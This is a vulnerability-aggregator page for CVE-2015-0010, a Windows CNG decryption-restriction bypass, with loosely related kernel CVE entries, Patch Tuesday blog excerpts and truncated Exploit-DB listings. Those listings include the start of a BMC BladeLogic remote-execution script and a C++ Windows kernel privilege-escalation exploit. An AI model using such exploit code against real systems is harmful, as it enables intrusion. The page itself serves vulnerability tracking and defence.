CVE-2015-0010
published 2015-02-11CVE-2015-0010: The CryptProtectMemory function in cng.sys (aka the Cryptography Next Generation driver) in the kernel-mode drivers in Microsoft Windows Server 2003 SP2…
PriorityP419low1.9CVSS 2.0
AVLACMAuNCPINAN
EXPLOIT
EPSS
2.65%
83.7th percentile
The CryptProtectMemory function in cng.sys (aka the Cryptography Next Generation driver) in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, when the CRYPTPROTECTMEMORY_SAME_LOGON option is used, does not check an impersonation token's level, which allows local users to bypass intended decryption restrictions by leveraging a service that (1) has a named-pipe planting vulnerability or (2) uses world-readable shared memory for encrypted data, aka "CNG Security Feature Bypass Vulnerability" or MSRC ID 20707.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
CVSS provenance
nvdv2.01.9LOWAV:L/AC:M/Au:N/C:P/I:N/A:N
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-m8v6-5m42-3wc3: The CryptProtectMemory function in cng
ghsa_unreviewed·2022-05-14
CVE-2015-0010 [LOW] GHSA-m8v6-5m42-3wc3: The CryptProtectMemory function in cng
The CryptProtectMemory function in cng.sys (aka the Cryptography Next Generation driver) in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, when the CRYPTPROTECTMEMORY_SAME_LOGON option is used, does not check an impersonation token's level, which allows local users to bypass intended decryption restrictions by leveraging a service that (1) has a named-pipe planting vulnerability or (2) uses world-readable shared memory for encrypted data, aka "CNG Security Feature Bypass Vulnerability" or MSRC ID 20707.
Red Hat
kernel: wifi: rtl818x: Kill URBs before clearing tx status queue
vendor_redhat·2025-08-19·CVSS 5.5
CVE-2025-38604 [MEDIUM] CWE-416 kernel: wifi: rtl818x: Kill URBs before clearing tx status queue
kernel: wifi: rtl818x: Kill URBs before clearing tx status queue
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtl818x: Kill URBs before clearing tx status queue
In rtl8187_stop() move the call of usb_kill_anchored_urbs() before clearing
b_tx_status.queue. This change prevents callbacks from using already freed
skb due to anchor was not killed before freeing such skb.
BUG: kernel NULL pointer dereference, address: 0000000000000080
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: Oops: 0000 [#1] SMP NOPTI
CPU: 7 UID: 0 PID: 0 Comm: swapper/7 Not tainted 6.15.0 #8 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 0.0.0 02/06/2015
RIP: 0010:ieee80211_tx_status_irqsafe+0x21/0xc0 [ma
Red Hat
kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
vendor_redhat·2025-06-18·CVSS 5.5
CVE-2022-50228 [MEDIUM] kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
In the Linux kernel, the following vulnerability has been resolved:
KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
Don't BUG/WARN on interrupt injection due to GIF being cleared,
since it's trivial for userspace to force the situation via
KVM_SET_VCPU_EVENTS (even if having at least a WARN there would be correct
for KVM internally generated injections).
kernel BUG at arch/x86/kvm/svm/svm.c:3386!
invalid opcode: 0000 [#1] SMP
CPU: 15 PID: 926 Comm: smm_test Not tainted 5.17.0-rc3+ #264
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:svm_inject_irq+0xab/0xb0 [kvm_amd]
Code: 0b 0f 1f 00 0f 1f 44 00 00 80 3d ac b3 01 00 00 55 48 89 f5 53
RSP: 0018:ffffc90000b37d88 EFL
Red Hat
kernel: udmabuf: change folios array from kmalloc to kvmalloc
vendor_redhat·2024-12-27·CVSS 5.5
CVE-2024-56544 [MEDIUM] CWE-476 kernel: udmabuf: change folios array from kmalloc to kvmalloc
kernel: udmabuf: change folios array from kmalloc to kvmalloc
In the Linux kernel, the following vulnerability has been resolved:
udmabuf: change folios array from kmalloc to kvmalloc
When PAGE_SIZE 4096, MAX_PAGE_ORDER 10, 64bit machine,
page_alloc only support 4MB.
If above this, trigger this warn and return NULL.
udmabuf can change size limit, if change it to 3072(3GB), and then alloc
3GB udmabuf, will fail create.
[ 4080.876581] ------------[ cut here ]------------
[ 4080.876843] WARNING: CPU: 3 PID: 2015 at mm/page_alloc.c:4556 __alloc_pages+0x2c8/0x350
[ 4080.878839] RIP: 0010:__alloc_pages+0x2c8/0x350
[ 4080.879470] Call Trace:
[ 4080.879473]
[ 4080.879473] ? __alloc_pages+0x2c8/0x350
[ 4080.879475] ? __warn.cold+0x8e/0xe8
[ 4080.880647] ? __alloc_pages+0x2c8/0x350
[ 4080.880909] ?
Red Hat
kernel: net/mlx5: Fix missing lock on sync reset reload
vendor_redhat·2024-08-17·CVSS 5.5
CVE-2024-42268 [MEDIUM] CWE-617 kernel: net/mlx5: Fix missing lock on sync reset reload
kernel: net/mlx5: Fix missing lock on sync reset reload
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Fix missing lock on sync reset reload
On sync reset reload work, when remote host updates devlink on reload
actions performed on that host, it misses taking devlink lock before
calling devlink_remote_reload_actions_performed() which results in
triggering lock assert like the following:
WARNING: CPU: 4 PID: 1164 at net/devlink/core.c:261 devl_assert_locked+0x3e/0x50
…
CPU: 4 PID: 1164 Comm: kworker/u96:6 Tainted: G S W 6.10.0-rc2+ #116
Hardware name: Supermicro SYS-2028TP-DECTR/X10DRT-PT, BIOS 2.0 12/18/2015
Workqueue: mlx5_fw_reset_events mlx5_sync_reset_reload_work [mlx5_core]
RIP: 0010:devl_assert_locked+0x3e/0x50
…
Call Trace:
? __warn+0xa4/0x210
? devl
Red Hat
kernel: platform/x86: x86-android-tablets: Unregister devices in reverse order
vendor_redhat·2024-07-12·CVSS 5.5
CVE-2024-40975 [MEDIUM] CWE-911 kernel: platform/x86: x86-android-tablets: Unregister devices in reverse order
kernel: platform/x86: x86-android-tablets: Unregister devices in reverse order
In the Linux kernel, the following vulnerability has been resolved:
platform/x86: x86-android-tablets: Unregister devices in reverse order
Not all subsystems support a device getting removed while there are
still consumers of the device with a reference to the device.
One example of this is the regulator subsystem. If a regulator gets
unregistered while there are still drivers holding a reference
a WARN() at drivers/regulator/core.c:5829 triggers, e.g.:
WARNING: CPU: 1 PID: 1587 at drivers/regulator/core.c:5829 regulator_unregister
Hardware name: Intel Corp. VALLEYVIEW C0 PLATFORM/BYT-T FFD8, BIOS BLADE_21.X64.0005.R00.1504101516 FFD8_X64_R_2015_04_10_1516 04/10/2015
RIP: 0010:regulator_unregister
Call Trace:
No detection rules found.
Exploit-DB
BMC BladeLogic 8.3.00.64 - Remote Command Execution
exploitdb·2018-01-26·CVSS 7.5
CVE-2016-1543 [HIGH] BMC BladeLogic 8.3.00.64 - Remote Command Execution
BMC BladeLogic 8.3.00.64 - Remote Command Execution
---
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version
# Filename: BMC_rexec.py
# Github: https://github.com/bao7uo/bmc_bladelogic
# Date: 2018-01-24
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: BMC RSCD agent 8.3.00.64
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543
# Tested on: 8.3.00.64
#!/usr/bin/python
# BMC BladeLogic RSCD agent remote exec - XMLRPC version
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# By Paul Taylor / Fore
Exploit-DB
Sendio ESP - Information Disclosure
exploitdb·2015-05-26·CVSS 5.0
CVE-2014-0999 [MEDIUM] Sendio ESP - Information Disclosure
Sendio ESP - Information Disclosure
---
1. Advisory Information
Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release
2. Vulnerability Information
Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391
3. Vulnerability Description
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterpr
Exploit-DB
Microsoft Windows - Local Privilege Escalation (MS15-010)
exploitdb·2015-05-25·CVSS 6.9
CVE-2015-0060 [MEDIUM] Microsoft Windows - Local Privilege Escalation (MS15-010)
Microsoft Windows - Local Privilege Escalation (MS15-010)
---
// ex.cpp
/*
Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
CVE-2015-0003
March 2015 (Public Release: May 24, 2015)
Tested on:
x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
x64: Win 2k8 SP1 | Win 2k8 R2 SP1
Author: Skylake - skylake mail com
*/
#include "ex.h"
_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;
DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}
BOOL find_and
Talos
Microsoft Patch Tuesday for February 2015: 56 vulnerabilities fixed
blogs_talos·2015-02-10·CVSS 6.8
[MEDIUM] Microsoft Patch Tuesday for February 2015: 56 vulnerabilities fixed
## Microsoft Patch Tuesday for February 2015: 56 vulnerabilities fixed
Microsoft’s Patch Tuesday for February 2015 has arrived. This month’s round of security updates is large with Microsoft releasing 9 bulletins addressing 56 CVEs. 3 of the bulletins are rated critical and address vulnerabilities within Internet Explorer, Windows, and Group Policy. The remaining 6 bulletins are rated important and address vulnerabilities in Office, Windows, Group Policy, and System Center Manager.
## Bulletins Rated Critical MS15-009, MS15-010, and MS15-011 are rated Critical.
MS15-009 is targeted at addressing multiple vulnerabilities within Internet Explorer, versions 6 through 11. In total, 41 different CVEs were addressed with the vast majority of the those CVEs fixing use-after-free vulnerabilitie
Qualys
Patch Tuesday February 2015 | Qualys
blogs_qualys·2015-02-10·CVSS 6.8
[MEDIUM] Patch Tuesday February 2015 | Qualys
February Patch Tuesday 2015 comes after a quite turbulent month for information security professionals. Not so much Microsoft, but Adobe has been keeping us busy with multiple disclosed 0-day vulnerabilities their Flash software. All of the known issues have been very quickly addressed by Adobe ( APSB15-02 , 03 and 04 ), typically turning around a fix in less than a week. Still, it is worrisome to see the amount of problems that cyber criminals are able to find in software that we all have installed and use in our daily lives.
Microsoft itself posted nine bulletins this month, four that fix remote code execution (RCE) type vulnerabilities, and five that are rated important addressing a number of of local vulnerabilities such as elevation of privilege and information disclosures.
The most
Talos
Microsoft Patch Tuesday for February 2015: 56 vulnerabilities fixed
blogs_talos·2015-02-10·CVSS 6.8
[MEDIUM] Microsoft Patch Tuesday for February 2015: 56 vulnerabilities fixed
Microsoft’s Patch Tuesday for February 2015 has arrived. This month’s round of security updates is large with Microsoft releasing 9 bulletins addressing 56 CVEs. 3 of the bulletins are rated critical and address vulnerabilities within Internet Explorer, Windows, and Group Policy. The remaining 6 bulletins are rated important and address vulnerabilities in Office, Windows, Group Policy, and System Center Manager.
### Bulletins Rated CriticalMS15-009, MS15-010, and MS15-011 are rated Critical.
MS15-009 is targeted at addressing multiple vulnerabilities within Internet Explorer, versions 6 through 11. In total, 41 different CVEs were addressed with the vast majority of the those CVEs fixing use-after-free vulnerabilities that could result in remote code execution. A couple ASLR bypasses, pr
Qualys
Patch Tuesday February 2015 | Qualys
blogs_qualys·2015-02-10·CVSS 6.8
[MEDIUM] Patch Tuesday February 2015 | Qualys
February Patch Tuesday 2015 comes after a quite turbulent month for information security professionals. Not so much Microsoft, but Adobe has been keeping us busy with multiple disclosed 0-day vulnerabilities their Flash software. All of the known issues have been very quickly addressed by Adobe (APSB15-02, 03 and 04), typically turning around a fix in less than a week. Still, it is worrisome to see the amount of problems that cyber criminals are able to find in software that we all have installed and use in our daily lives.
Microsoft itself posted nine bulletins this month, four that fix remote code execution (RCE) type vulnerabilities, and five that are rated important addressing a number of of local vulnerabilities such as elevation of privilege and information disclosures.
The most im
Bugzilla
CVE-2025-38604 kernel: wifi: rtl818x: Kill URBs before clearing tx status queue
bugzilla·2025-08-19·CVSS 5.5
CVE-2025-38604 [MEDIUM] CVE-2025-38604 kernel: wifi: rtl818x: Kill URBs before clearing tx status queue
CVE-2025-38604 kernel: wifi: rtl818x: Kill URBs before clearing tx status queue
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtl818x: Kill URBs before clearing tx status queue
In rtl8187_stop() move the call of usb_kill_anchored_urbs() before clearing
b_tx_status.queue. This change prevents callbacks from using already freed
skb due to anchor was not killed before freeing such skb.
BUG: kernel NULL pointer dereference, address: 0000000000000080
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: Oops: 0000 [#1] SMP NOPTI
CPU: 7 UID: 0 PID: 0 Comm: swapper/7 Not tainted 6.15.0 #8 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 0.0.0 02/06/2015
RIP: 0010:ieee80211_tx_status_irq
Bugzilla
CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
bugzilla·2025-02-27
CVE-2025-21740 CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
When waking a VM's NX huge page recovery thread, ensure the thread is
actually alive before trying to wake it. Now that the thread is spawned
on-demand during KVM_RUN, a VM without a recovery thread is reachable via
the related module params.
BUG: kernel NULL pointer dereference, address: 0000000000000040
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:vhost_task_wake+0x5/0x10
Call Trace:
set_nx_huge_pages+0xcc/0x1e0 [kvm]
param_att
http://code.google.com/p/google-security-research/issues/detail?id=128http://www.securityfocus.com/bid/72461https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-010http://code.google.com/p/google-security-research/issues/detail?id=128http://www.securityfocus.com/bid/72461https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-010
2015-02-11
Published